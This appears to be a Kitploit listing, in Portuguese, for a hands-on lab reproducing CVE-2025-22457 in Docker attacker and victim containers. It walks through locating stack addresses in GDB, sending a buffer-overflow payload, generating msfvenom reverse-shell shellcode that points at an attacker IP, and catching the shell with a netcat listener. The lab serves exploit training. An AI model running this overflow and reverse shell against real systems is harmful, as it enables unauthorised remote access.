Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-22457-vulnserver-lab — Laboratório prático reproduzindo o CVE-2025-22457: configura contêineres Docker de atacante/vítima, encontra endereços de pilha com GDB e entrega um exploit de reverse shell com msfvenom. | Kitploit
Ferramentas/GitHubGitHub/donofly/cve-2025-22457-vulnserver-lab
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeCTFTestes de PenetraçãoAprendizado e EducaçãoExploração de BináriosLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubdonofly/cve-2025-22457-vulnserver-lab

CVE-2025-22457-vulnserver-lab

Laboratório prático reproduzindo o CVE-2025-22457: configura contêineres Docker de atacante/vítima, encontra endereços de pilha com GDB e entrega um exploit de reverse shell com msfvenom.

Ver Repositório
há 21h 3mAinda não revisado
Compartilhar

step 1 configuração do ambiente

Permissões & script de execução

Se estiver a usar Windows, pode abrir o wsl para executar

root@kitploit:~
chmod +x setup_environment.sh
./setup_environment.sh

step 2: Encontrar valores dinâmicos (passos manuais necessários)

Como os endereços de memória e o IP são dinâmicos em ambientes diferentes, é necessário encontrá-los manualmente e atualizar o script exploit.py.

2.0 Primeiro abra dois docker attacker e um docker victim como preparação para os passos seguintes

root@kitploit:~
docker exec -it atac /bin/bash
docker exec -it vic /bin/bash

2.1 Encontrar stack_address (endereço de retorno)

O objetivo deste passo é encontrar um endereço de pilha estável, para que o nosso payload possa saltar com precisão.

1. Iniciar o GDB no docker victim
root@kitploit:~
gdb ./vulnserver
2. Definir um breakpoint após a função strcpy
root@kitploit:~
(gdb) b strcpy
3. Executar o programa, o vulnserver começa a escutar
root@kitploit:~
(gdb) run

Acionar o breakpoint: Usando o docker attacker, execute o seguinte comando para enviar um payload de teste. Isto fará com que o GDB pare no breakpoint. Nota: Substitua <VICTIM_IP> pelo Victim IP mostrado no passo um.

root@kitploit:~
python3 -c 'import socket; s = socket.socket(); s.connect(("<VICTIM_IP>", 9999)); s.send(b"A"*516 + b"BBBB" + b"C"*300); s.close()'

Encontrar e registar o endereço: Volte à janela do terminal onde está o GDB, o programa já deve ter parado. Execute o seguinte comando para inspecionar a pilha:

root@kitploit:~
(gdb) x/200wx $esp

Na saída, encontre uma região composta por 0x43434343 (que representa 'C'). Escolha um endereço qualquer do meio dessa região (por exemplo 0xffffd580) e copie-o. Este é o stack_address.

2.2 Atualizar exploit.py e gerar buf (Shellcode)

Atualizar stack_address:

Com um editor de texto, atualize o stack_address no exploit.py para o endereço que acabou de copiar

Gerar e atualizar buf (Shellcode):

No shell do contentor attacker, execute o comando msfvenom para gerar o shellcode. Nota: Substitua <ATTACKER_IP> pelo Attacker IP mostrado no passo um.

root@kitploit:~
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -b '\x00' -f python

Copie todo o bloco de código buf = b""... produzido pelo msfvenom e use-o para substituir completamente a parte da variável buf existente no ficheiro exploit.py.

step 3 : Executar o ataque

Iniciar o listener: Na janela de shell de um dos contentores attacker, execute o seguinte comando para iniciar o listener netcat.

root@kitploit:~
nc -lvnp 4444

victim abrir a ligação:

Pode usar os dois métodos seguintes Método um

root@kitploit:~
./vulnserver

Método dois

root@kitploit:~
gdb ./vulnserver
gef➤  run

Executar o script de ataque: Execute o exploit.py atualizado no docker attacker. (Nota: atualize <victim_ip> para o victim ip mostrado no passo um)

root@kitploit:~
python3 exploit.py <victim_ip>

Verificar o resultado: Volte à janela onde está o listener netcat. Se tudo correr bem, verá uma ligação estabelecida e obterá uma shell interativa. Pode introduzir comandos como whoami, ls -la para verificar.

step 4 : Limpar o ambiente

Sair do GDB e do contentor:
root@kitploit:~
Introduza quit no GDB e depois exit no shell do contentor.

Pode executar os seguintes comandos para parar e limpar todos os contentores e redes.

root@kitploit:~
docker stop vic atac
docker network rm 111550082_net
Baixar ferramenta